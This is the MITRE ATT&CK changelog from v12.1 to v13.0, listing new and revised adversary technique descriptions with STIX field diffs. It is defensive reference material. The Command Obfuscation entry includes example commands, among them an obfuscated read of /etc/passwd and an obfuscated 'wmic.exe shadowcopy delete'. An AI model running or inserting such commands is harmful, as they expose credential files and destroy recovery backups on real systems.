ATT&CK Changes Between v12.1 and v13.0

Key

Colors for description field
Added
Changed
Deleted

Additional formats

These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.

This JSON file contains the machine readble output used to create this page: changelog.json

Techniques

enterprise-attack

New Techniques

[T1650] Acquire Access

Current version: 1.0

Description: Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022) Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service) By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers) In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195). **Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).


[T1552.008] Unsecured Credentials: Chat Messages

Current version: 1.0

Description: Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels. Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).


[T1059.009] Command and Scripting Interpreter: Cloud API

Current version: 1.0

Description: Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: A), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006). Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies. With proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.


[T1651] Cloud Administration Command

Current version: 1.0

Description: Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)


[T1021.007] Remote Services: Cloud Services

Current version: 1.0

Description: Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. Many enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as Connect-AZAccount for Azure PowerShell, Connect-MgGraph for Microsoft Graph PowerShell, and gcloud auth login for the Google Cloud CLI. In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password.


[T1027.010] Obfuscated Files or Information: Command Obfuscation

Current version: 1.0

Description: Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE) For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017) Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC) Tools such as Invoke-Obfuscation and Invoke-DOSfucation have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)


[T1652] Device Driver Discovery

Current version: 1.0

Description: Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)). Many OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers) On Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)


[T1567.003] Exfiltration Over Web Service: Exfiltration to Text Storage Sites

Current version: 1.0

Description: Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information. Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec) **Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.


[T1027.011] Obfuscated Files or Information: Fileless Storage

Current version: 1.0

Description: Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\System32\Wbem\Repository`) or Registry (e.g., `%SystemRoot%\System32\Config`) physical files.(Citation: Microsoft Fileless)


[T1583.008] Acquire Infrastructure: Malvertising

Current version: 1.0

Description: Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) Malvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising) Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising)


[T1036.008] Masquerading: Masquerade File Type

Current version: 1.0

Description: Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`. Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension. Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)


[T1556.008] Modify Authentication Process: Network Provider DLL

Current version: 1.0

Description: Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) Adversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify) Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)


[T1562.011] Impair Defenses: Spoof Security Alerting

Current version: 1.0

Description: Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident. Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses. For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)

Major Version Changes

[T1217] Browser Information Discovery

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may enumerate browser bookmarks to learn more abt1Adversaries may enumerate information about browsers to lear
>out compromised hosts. Browser bookmarks may reveal personal>n more about compromised environments. Data saved by browser
> information about users (ex: banking sites, interests, soci>s (such as bookmarks, accounts, and browsing history) may re
>al media, etc.) as well as details about internal network re>veal a variety of personal information about users (e.g., ba
>sources such as servers, tools/dashboards, or other related >nking sites, relationships/interests, social media, etc.) as
>infrastructure.  Browser bookmarks may also highlight additi> well as details about internal network resources such as se
>onal targets after an adversary has access to valid credenti>rvers, tools/dashboards, or other related infrastructure.(Ci
>als, especially [Credentials In Files](https://attack.mitre.>tation: Kaspersky Autofill)  Browser information may also hi
>org/techniques/T1552/001) associated with logins cached by a>ghlight additional targets after an adversary has access to 
> browser.  Specific storage locations vary based on platform>valid credentials, especially [Credentials In Files](https:/
> and/or application, but browser bookmarks are typically sto>/attack.mitre.org/techniques/T1552/001) associated with logi
>red in local files/databases.>ns cached by a browser.  Specific storage locations vary bas
 >ed on platform and/or application, but browser information i
 >s typically stored in local files and databases (e.g., `%APP
 >DATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 16:06:07.367000+00:002023-04-16 14:24:40.625000+00:00
nameBrowser Bookmark DiscoveryBrowser Information Discovery
descriptionAdversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser. Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill) Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser. Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Chrome Roaming Profiles', 'description': 'Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.', 'url': 'https://support.google.com/chrome/a/answer/7349337'}
external_references{'source_name': 'Kaspersky Autofill', 'description': 'Golubev, S. (n.d.). How malware steals autofill data from browsers. Retrieved March 28, 2023.', 'url': 'https://www.kaspersky.com/blog/browser-data-theft/27871/'}
x_mitre_contributorsManikantan Srinivasan, NEC Corporation India
x_mitre_contributorsYinon Engelsman, Talon Cyber Security
x_mitre_contributorsYonatan Gotlib, Talon Cyber Security
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
Minor Version Changes

[T1548] Abuse Elevation Control Mechanism

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-21 19:01:25.043000+00:002023-04-21 12:35:07.744000+00:00
x_mitre_data_sources[0]Command: Command ExecutionFile: File Metadata
x_mitre_data_sources[1]File: File ModificationProcess: OS API Execution
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[3]Process: Process MetadataCommand: Command Execution
x_mitre_data_sources[4]Process: Process CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[5]Process: OS API ExecutionProcess: Process Metadata
x_mitre_data_sources[6]File: File MetadataFile: File Modification
x_mitre_version1.01.1

[T1546.008] Event Triggered Execution: Accessibility Features

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesComi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-558
values_changed
STIX FieldOld valueNew Value
modified2020-05-13 20:37:30.048000+00:002023-04-21 12:33:18.602000+00:00
external_references[1]['source_name']capecNarrator Accessibility Abuse
external_references[1]['url']https://capec.mitre.org/data/definitions/558.htmlhttps://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
x_mitre_data_sources[0]File: File ModificationCommand: Command Execution
x_mitre_data_sources[1]File: File CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationFile: File Modification
x_mitre_data_sources[4]Command: Command ExecutionFile: File Creation
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Narrator Accessibility Abuse', 'description': "Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.", 'url': 'https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html'}

[T1531] Account Access Removal

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may interrupt availability of system and networkt1Adversaries may interrupt availability of system and network
> resources by inhibiting access to accounts utilized by legi> resources by inhibiting access to accounts utilized by legi
>timate users. Accounts may be deleted, locked, or manipulate>timate users. Accounts may be deleted, locked, or manipulate
>d (ex: changed credentials) to remove access to accounts. Ad>d (ex: changed credentials) to remove access to accounts. Ad
>versaries may also subsequently log off and/or perform a [Sy>versaries may also subsequently log off and/or perform a [Sy
>stem Shutdown/Reboot](https://attack.mitre.org/techniques/T1>stem Shutdown/Reboot](https://attack.mitre.org/techniques/T1
>529) to set malicious changes into place.(Citation: CarbonBl>529) to set malicious changes into place.(Citation: CarbonBl
>ack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)  In W>ack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)  In W
>indows, [Net](https://attack.mitre.org/software/S0039) utili>indows, [Net](https://attack.mitre.org/software/S0039) utili
>ty, <code>Set-LocalUser</code> and <code>Set-ADAccountPasswo>ty, <code>Set-LocalUser</code> and <code>Set-ADAccountPasswo
>rd</code> [PowerShell](https://attack.mitre.org/techniques/T>rd</code> [PowerShell](https://attack.mitre.org/techniques/T
>1059/001) cmdlets may be used by adversaries to modify user >1059/001) cmdlets may be used by adversaries to modify user 
>accounts. In Linux, the <code>passwd</code> utility may be u>accounts. In Linux, the <code>passwd</code> utility may be u
>sed to change passwords. Accounts could also be disabled by >sed to change passwords. Accounts could also be disabled by 
>Group Policy.   Adversaries who use ransomware may first per>Group Policy.   Adversaries who use ransomware or similar at
>form this and other Impact behaviors, such as [Data Destruct>tacks may first perform this and other Impact behaviors, suc
>ion](https://attack.mitre.org/techniques/T1485) and [Defacem>h as [Data Destruction](https://attack.mitre.org/techniques/
>ent](https://attack.mitre.org/techniques/T1491), before comp>T1485) and [Defacement](https://attack.mitre.org/techniques/
>leting the [Data Encrypted for Impact](https://attack.mitre.>T1491), in order to impede incident response/recovery before
>org/techniques/T1486) objective. > completing the [Data Encrypted for Impact](https://attack.m
 >itre.org/techniques/T1486) objective. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Hubert Mank']
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 22:57:27.449000+00:002023-03-22 20:39:15.680000+00:00
descriptionAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. Adversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesUser Account: User Account Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesUser Account: User Account Modification

[T1087] Account Discovery

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
New Description
t1Adversaries may attempt to get a listing of accounts on a syt1Adversaries may attempt to get a listing of valid accounts, 
>stem or within an environment. This information can help adv>usernames, or email addresses on a system or within a compro
>ersaries determine which accounts exist to aid in follow-on >mised environment. This information can help adversaries det
>behavior.>ermine which accounts exist, which can aid in follow-on beha
 >vior such as brute-forcing, spear-phishing attacks, or accou
 >nt takeovers (e.g., [Valid Accounts](https://attack.mitre.or
 >g/techniques/T1078)).  Adversaries may use several methods t
 >o enumerate accounts, including abuse of existing tools, bui
 >lt-in commands, and potential misconfigurations that leak ac
 >count names and roles or permissions in the targeted environ
 >ment.  For examples, cloud environments typically provide ea
 >sily accessible interfaces to obtain user lists. On hosts, a
 >dversaries can use default [PowerShell](https://attack.mitre
 >.org/techniques/T1059/001) and other command line functional
 >ity to identify accounts. Information about email addresses 
 >and accounts may also be extracted by searching an infected 
 >system’s files.

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesStepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-575
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 14:05:15.038000+00:002023-04-15 17:24:23.029000+00:00
descriptionAdversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.
external_references[1]['source_name']capecElastic - Koadiac Detection with EQL
external_references[1]['url']https://capec.mitre.org/data/definitions/575.htmlhttps://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql
x_mitre_data_sources[0]File: File AccessProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationFile: File Access
x_mitre_version2.32.4
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Elastic - Koadiac Detection with EQL', 'description': 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.', 'url': 'https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql'}

[T1098] Account Manipulation

Current version: 2.5

Version changed from: 2.4 → 2.5

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 15:50:24.811000+00:002023-04-12 23:29:30.966000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Group: Group ModificationCommand: Command Execution
x_mitre_data_sources[2]Process: Process CreationActive Directory: Active Directory Object Modification
x_mitre_data_sources[3]Active Directory: Active Directory Object ModificationGroup: Group Modification
x_mitre_data_sources[4]Command: Command ExecutionFile: File Modification
x_mitre_data_sources[5]File: File ModificationProcess: Process Creation
x_mitre_version2.42.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1583] Acquire Infrastructure

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may buy, lease, or rent infrastructure that can t1Adversaries may buy, lease, or rent infrastructure that can 
>be used during targeting. A wide variety of infrastructure e>be used during targeting. A wide variety of infrastructure e
>xists for hosting and orchestrating adversary operations. In>xists for hosting and orchestrating adversary operations. In
>frastructure solutions include physical or cloud servers, do>frastructure solutions include physical or cloud servers, do
>mains, and third-party web services.(Citation: TrendmicroHid>mains, and third-party web services.(Citation: TrendmicroHid
>eoutsLease) Additionally, botnets are available for rent or >eoutsLease) Additionally, botnets are available for rent or 
>purchase.  Use of these infrastructure solutions allows an a>purchase.  Use of these infrastructure solutions allows adve
>dversary to stage, launch, and execute an operation. Solutio>rsaries to stage, launch, and execute operations. Solutions 
>ns may help adversary operations blend in with traffic that >may help adversary operations blend in with traffic that is 
>is seen as normal, such as contact to third-party web servic>seen as normal, such as contacting third-party web services 
>es. Depending on the implementation, adversaries may use inf>or acquiring infrastructure to support [Proxy](https://attac
>rastructure that makes it difficult to physically tie back t>k.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus
>o them as well as utilize infrastructure that can be rapidly>) Depending on the implementation, adversaries may use infra
> provisioned, modified, and shut down.>structure that makes it difficult to physically tie back to 
 >them as well as utilize infrastructure that can be rapidly p
 >rovisioned, modified, and shut down.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Shailesh Tiwary (Indian Army)']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 15:45:02.209000+00:002023-03-02 21:34:46.139000+00:00
descriptionAdversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as 